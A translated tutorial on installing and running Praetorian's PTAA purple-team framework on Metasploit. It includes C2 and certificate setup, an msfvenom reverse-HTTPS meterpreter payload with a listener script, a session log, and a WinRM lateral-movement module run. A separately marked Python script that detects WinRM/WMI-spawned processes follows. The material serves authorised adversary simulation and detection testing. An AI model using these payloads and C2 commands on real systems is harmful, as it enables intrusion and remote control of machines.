SLTechnology News & Howtos > Development (updated 2025-04-03)
Shulou (Shulou.com) 06/02 report
Today I will walk you through how to use the automated penetration testing tool PTAA (Praetorian's Purple Team Attack Automation), which may not be familiar to many people. To help you understand it better, the editor has summarised the following content; I hope you get something from this article.
To evaluate security detection and incident response capabilities, we wanted a way to automatically simulate an adversary's attack techniques. Through this research we implemented MITRE ATT&CK TTPs as Metasploit Framework post modules. At present the tool can automatically simulate more than 100 TTPs.
Metasploit's advantage is its stable, robust and rich function library. Framework modules interact directly with the operating system API and are flexible and easy to extend. In addition, Metasploit's execute_powershell module lets us simulate behaviours such as in-memory .NET execution. This lets blue teams confirm that their tooling reliably alerts on specific TTP behaviours (for example, encoded PowerShell) rather than on specific code or actions.
Our tool is based on the latest Metasploit release at the time of development (April 9, 2019: [Metasploit download address]). While implementing the automation we kept modifications to the Metasploit framework source to a minimum, so that users get an experience close to native Metasploit.
Tool installation
C2 server: register and build a cloud virtual machine.
DNS: choose a domain name and register it in DNS.
SSL: we recommend using a valid SSL certificate for testing. LetsEncrypt is recommended:
export DNS_NAME="mytestdomain.com"
wget https://dl.eff.org/certbot-auto
chmod a+x ./certbot-auto
# first run installs certbot-auto's own dependencies (-q: quiet)
./certbot-auto -q
# issue a standalone certificate for the C2 domain, non-interactively
./certbot-auto certonly -d $DNS_NAME --standalone --register-unsafely-without-email -n --agree-tos
Debian/Ubuntu
Installation source: https://github.com/rapid7/metasploit-framework/tree/master/docker
Install docker:
curl -fsSL https://download.docker.com/linux/ubuntu/gpg | apt-key add -
apt-key fingerprint 0EBFCD88
add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/debian jessie stable"
apt-get -y update
apt-get -y install docker-ce
Get the project source code:
git clone git@github.com:praetorian-inc/purple-team-attack-automation.git
cd purple-team-attack-automation
Modify LHOST and external port:
cat > docker-compose.local.override.yml <<'EOF'
version: '3'
services:
  ms:
    environment:
      # example of setting LHOST
      LHOST: 0.0.0.0
    # example of adding more ports
    ports:
      - 8080:8080
      - 443:443
      - 80:80
EOF
Set the COMPOSE_FILE environment variable and load the local file:
echo "COMPOSE_FILE=./docker-compose.yml:./docker-compose.override.yml:./docker-compose.local.override.yml" >> .env
Build the container:
docker-compose build
Run the container:
./docker/bin/msfconsole
Modify metasploit directory permissions:
chmod -R ugo+rw ~/.msf4
Payload
cd ~
# install Metasploit on the host so that msfvenom is available
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \
chmod 755 msfinstall && \
./msfinstall
# generate the test payload, pinned to the listener's certificate (MSF.pem)
msfvenom -p windows/x64/meterpreter_reverse_https lhost=mytestdomain.com lport=443 -a x64 -f exe HandlerSSLCert=~/purple-team-attack-automation/MSF.pem StagerVerifySSLCert=true -o ~/attack-testing.exe
Listener
You can use the sample resource script to turn on the listener:
# the <ruby> tags mark the block as Ruby code for msfconsole's resource-script processor
echo '<ruby>
print_status("Starting HTTPS listener for Windows x64 meterpreter on port 443.")
run_single("use exploit/multi/handler")
run_single("set payload windows/x64/meterpreter_reverse_https")
run_single("set lport 443")
run_single("set HandlerSSLCert MSF.pem")
run_single("set ExitOnSession false")
run_single("set StagerVerifySSLCert true")
run_single("exploit -j")
</ruby>' > ~/purple-team-attack-automation/scripts/resource/windows_listener.rc
With the listener running, execute the payload on the test machine with administrator privileges; it will call back to the listener.
Use the module
msf5 auxiliary(scanner/smb/impacket/secretsdump) > resource windows_listener.rc
[*] Processing /usr/src/metasploit-framework/scripts/resource/windows_listener.rc for ERB directives.
[*] resource (/usr/src/metasploit-framework/scripts/resource/windows_listener.rc)> Ruby Code (270 bytes)
[*] Starting HTTPS listener for Windows x64 meterpreter on port 443.
payload => windows/x64/meterpreter_reverse_https
lport => 443
lhost => 0.0.0.0
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf5 exploit(multi/handler) >
[*] Started HTTPS reverse handler on https://0.0.0.0:443
[*] https://0.0.0.0:443 handling request from 192.168.137.11; (UUID: czgdxj3z) Redirecting stageless connection from /2F-7ig9OfztlUGRSOeTJogLC1HD_4Yf2RGj-ZlWaPE6oCIdO_nvk_GC913H-gXl7lhXUXYcn with UA 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'
[*] https://0.0.0.0:443 handling request from 192.168.137.11; (UUID: czgdxj3z) Attaching orphaned/stageless session...
[*] Meterpreter session 1 opened (172.18.0.3:443 -> 192.168.137.11:52012) at 2019-04-15 16:10:27 +0000

msf5 post(windows/purple/t1005) > use post/windows/purple/t1028
msf5 post(windows/purple/t1028) > info

       Name: Windows Remote Management (T1028) Windows - Purple Team
     Module: post/windows/purple/t1028
   Platform: Windows
       Arch:
       Rank: Normal

Provided by:
  Praetorian

Compatible session types:
  Meterpreter

Basic options:
  Name     Current Setting                                                      Required  Description
  ----     ---------------                                                      --------  -----------
  CLEANUP  true                                                                 yes       Close any instances of calc
  CMD      winrm qc -q & winrm i c wmicimv2/Win32_Process @{CommandLine="calc"}  yes       Command to execute
  SESSION  1                                                                    yes       The session to run this module on.

Description:
  Execution, Lateral Movement: Windows Remote Management (WinRM) is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services). It may be called with the winrm command or by any number of programs such as PowerShell.

References:
  CVE: Not available
  https://attack.mitre.org/wiki/Technique/T1028

msf5 post(windows/purple/t1028) > exploit

[+] Found an instance of Calculator running. Killing it.
[*] Executing 'cmd /c winrm qc -q & winrm i c wmicimv2/Win32_Process @{CommandLine="calc"}' on #
[!] WinRM service is already running on this machine.
WSManFault
    Message
        ProviderFault
            WSManFault
                Message = WinRM firewall exception will not work since one of the network connection types on this machine is set to Public. Change the network connection type to either Domain or Private and try again.

Error number:  -2144108183 0x80338169
WinRM firewall exception will not work since one of the network connection types on this machine is set to Public. Change the network connection type to either Domain or Private and try again.
create_OUTPUT
    ProcessId = 5456
    ReturnValue = 0
[+] Module T1028W execution successful.
[+] Found an instance of Calculator running. Killing it.
[+] Found an instance of Calculator running. Killing it.
[*] Post module execution completed
msf5 post(windows/purple/t1028) >

After reading the above, do you have a better understanding of how to use the automated penetration testing tool PTAA? If you want to learn more, please follow the industry information channel; thank you for your support.
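The T1028 run above is only useful if the blue team can confirm it was detected. The following is an added example (not part of the article or of the PTAA project) of the kind of check a detection engineer would run over endpoint telemetry after the simulation: it flags process creations whose parent is a WinRM or WMI provider host, so the alert keys on the behaviour rather than on the "calc" artifact that the module's CMD option happens to launch. The event records are constructed, reduced Sysmon Event ID 1 fields; PIDs, user and timestamps are made-up values.

```python
"""Detection check for the WinRM (T1028) simulation: flag process creations whose
parent is a WinRM or WMI provider host, regardless of which command was run."""
import json

# Constructed sample of Sysmon Event ID 1 (process create) records, reduced to the
# fields the check needs. PIDs, user and timestamps are made-up values.
SAMPLE_EVENTS = [
    {"EventID": 1, "UtcTime": "2019-04-15 16:11:02", "User": "LAB\\tester",
     "Image": "C:\\Windows\\System32\\calc.exe", "CommandLine": "calc",
     "ParentImage": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", "ProcessId": 5456},
    {"EventID": 1, "UtcTime": "2019-04-15 16:11:03", "User": "LAB\\tester",
     "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd /c winrm qc -q",
     "ParentImage": "C:\\Users\\tester\\attack-testing.exe", "ProcessId": 5460},
    {"EventID": 1, "UtcTime": "2019-04-15 16:11:09", "User": "LAB\\tester",
     "Image": "C:\\Windows\\System32\\whoami.exe", "CommandLine": "whoami",
     "ParentImage": "C:\\Windows\\System32\\wsmprovhost.exe", "ProcessId": 5472},
    {"EventID": 1, "UtcTime": "2019-04-15 16:12:00", "User": "LAB\\tester",
     "Image": "C:\\Windows\\System32\\notepad.exe", "CommandLine": "notepad",
     "ParentImage": "C:\\Windows\\explorer.exe", "ProcessId": 5490},
]

# Parents that indicate the child was started through WinRM: wsmprovhost.exe hosts
# WinRM shells and plugins, WmiPrvSE.exe hosts WMI providers (Win32_Process.Create).
REMOTE_EXEC_PARENTS = {"wsmprovhost.exe", "wmiprvse.exe"}

def basename(path):
    """Lower-cased file name of a Windows path (case-insensitive comparisons)."""
    return path.rsplit("\\", 1)[-1].lower()

def detect_winrm_execution(events):
    """Return alerts for process-create events whose parent is a WinRM/WMI host.
    Matching on the parent (the behaviour) rather than on 'calc' (the artifact)
    means changing the module's CMD option does not evade the check."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != 1:
            continue
        parent = basename(ev.get("ParentImage", ""))
        if parent in REMOTE_EXEC_PARENTS:
            alerts.append({"technique": "T1028", "time": ev["UtcTime"],
                           "parent": parent, "child": basename(ev["Image"]),
                           "cmdline": ev["CommandLine"], "user": ev["User"]})
    return alerts

if __name__ == "__main__":
    for alert in detect_winrm_execution(SAMPLE_EVENTS):
        print(json.dumps(alert))
```

On the sample set this yields two alerts (calc.exe under WmiPrvSE.exe and whoami.exe under wsmprovhost.exe) and stays quiet on the explorer-launched notepad and on the module's own cmd.exe, whose parent is the test payload.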